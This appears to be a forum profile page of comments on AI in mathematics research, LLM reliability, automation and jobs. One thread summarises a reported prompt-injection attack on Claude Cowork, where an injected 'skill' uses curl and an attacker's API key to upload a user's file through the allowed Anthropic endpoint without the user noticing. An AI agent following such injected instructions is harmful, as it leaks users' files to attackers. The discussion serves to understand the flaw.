More

Davidzheng · 2026-01-19T05:45:19 1768801519

lol if they don't put the phone down now, then how can AI generated content specifically optimized to get people to stay be any better.

Davidzheng · 2026-01-18T17:46:27 1768758387

I think it's a bit early to tell whether GPT 5.2 has helped research mathematicians substantially given its recency. The models move so fast that even if all previous models were completely useless I wouldn't be sure this one would be. Let's wait a year and see? (it takes time to write papers)

mlpoknbji · 2026-01-18T18:17:56 1768760276

It's helped, but it's not correct that mathematicians are scoring major results by just feeding their problems to gpt 5.2 pro, so the OP claim that mathematicians are just playing off AI output as their own is silly. Here, im talking about serious mathematical work, not people posting (unattributed AI slop to the arXiv).

I assume OP was mostly joking, but we need to take care about letting AI companies hype up their impressive progress at the expense of mathematics. This needs to be discussed responsibly.

Davidzheng · 2026-01-18T08:12:50 1768723970

And we can train models specifically at math proofs? I think only difference is that math is bigger....

Davidzheng · 2026-01-18T08:12:08 1768723928

I actually don't think the reason is that they are easier than other open math problems. I think it's more that they are "elementary" in the sense that the problems usually don't require a huge amount of domain knowledge to state.

xigoi · 2026-01-18T09:52:06 1768729926

The Collatz conjecture can be stated using basic arithmetic, yet LLMs have not been able to solve it.

Davidzheng · 2026-01-18T09:58:59 1768730339

I agree it's easier than Collatz. I just mean I am not sure it's much easier than many currently open questions which are less famous but need more machinery.

_fizz_buzz_ · 2026-01-18T12:12:55 1768738375

That is also one of the hardest problems.

Davidzheng · 2026-01-18T08:10:28 1768723828

I'm actually not sure what the right attribution method would be. I'd lean towards single line on acknowledgements? Because you can use it for example @ every lemma during brainstorming but it's unclear the right convention is to thank it at every lemma...

Anecdotally, I, as a math postdoc, think that GPT 5.2 is much stronger qualitatively than anything else I've used. Its rate of hallucinations is low enough that I don't feel like the default assumption of any solution is that it is trying to hide a mistake somewhere. Compared with Gemini 3 whose failure mode when it can't solve something is always to pretend it has a solution by "lying"/ omitting steps/making up theorems etc... GPT 5.2 usually fails gracefully and when it makes a mistake it more often than not can admit it when pointed out.

Davidzheng · 2026-01-18T08:05:07 1768723507

"Since $U_{k+1} \subseteq U_k$, the sets $U_k$ are decreasing and periodic, and their intersection $U = \bigcap_{k \ge 1} U_k$ has density $d = \lim_{k \to \infty} d_k \ge \epsilon$."

Is this enough? Let $U_k$ be the set of integers such that their remainder mod 6^n is greater or equal to 2^n for all 1<n<k. Density of each $U_k$ is more than 1/2 I think but not the intersection (empty) right?

Paracompact · 2026-01-18T10:15:44 1768731344

Indeed. Your sets are decreasing periodic of density always greater than the product from k=1 to infinity of (1-(1/3)^k), which is about 0.56, yet their intersection is null.

This would all be a fairly trivial exercise in diagonalization if such a lemma as implied by Deepseek existed.

(Edit: The bounding I suggested may not be precise at each level, but it is asymptotically the limit of the sequence of densities, so up to some epsilon it demonstrates the desired counterexample.)

Davidzheng · 2026-01-15T04:56:30 1768452990

I'm being kind of stupid but why does the prompt injection need to POST to anthropic servers at all, does claude cowork have some protections against POST to arbitrary domain but allow POST to anthropic with arbitrary user or something?

rswail · 2026-01-15T07:31:12 1768462272

In the article it says that Cowork is running in a VM that has limited network availability, but the Anthropic endpoint is required. What they don't do is check that the API call you make is using the same API key as the one you created the Cowork session with.

So the prompt injection adds a "skill" that uses curl to send the file to the attacker via their API key and the file upload function.

pleurotus · 2026-01-15T07:17:29 1768461449

Yeah they mention it in the article, most network connections are restricted. But not connections to anthropic. To spell out the obvious—because Claude needs to talk to its own servers. But here they show you can get it to talk to its own servers, but put some documents in another user's account, using the different API key. All in a way that you, as an end user, wouldn't really see while it's happening.

Davidzheng · 2026-01-13T12:10:52 1768306252

Many people will have to ask themselves these question soon regardless of their actions. I don't understand the critique here.

samiv · 2026-01-13T14:54:09 1768316049

It's more like just pondering out loud how automating ourselves out of a job in an economic system that requires us to have a job is going to pan out for the large majority of people in the coming years.

FloorEgg · 2026-01-13T21:28:29 1768339709

As someone who has been pondering this very question since 2015, I'm starting to think we have been:

- underestimating how much range humans have in their intelligence and how important it is to productivity.

- overestimating how close LLMs are to replicating that range and underestimating how hard it will be for AI to reach it

- underestimating human capacity to become dissatisfied and invent more work for people to do

- underestimating unmet demand for the work people are doing that LLMs can make orders of magnitude more efficient

I was pretty convinced of the whole "post scarcity" singularity U mindset up until the last year or two... My confidence is low, but I'm now leaning more towards jevins paradox abound and a very slow super intelligence takeoff with more time for the economy to adapt.

The shift in my view has come from spending thousands of hours working with LLMs to code and building applications powered by LLMs, trying to get them to do things and constantly running into their limitations, and noting how the boundary of their limitations have been changing over time. (Looks more like S-curve to me than exponential takeoff). Also some recent interviews by some of the leading researchers, and spending a few hundred hours studying the architecture of human brain and theories regarding intelligence.

Davidzheng · 2026-01-13T04:44:05 1768279445

I think the function of a company is to address limitations of a single human by distributing a task across different people and stabilized with some bureaucracy. However, if we can train models past human scales at corporation scale, there might be large efficiency gains when the entire corporation can function literally as a single organism instead of coordinating separate entities. I think the impact of this phase of AI will be really big.

Davidzheng · 2026-01-13T01:24:54 1768267494

probably not actually turing complete right? for one it is not infinite so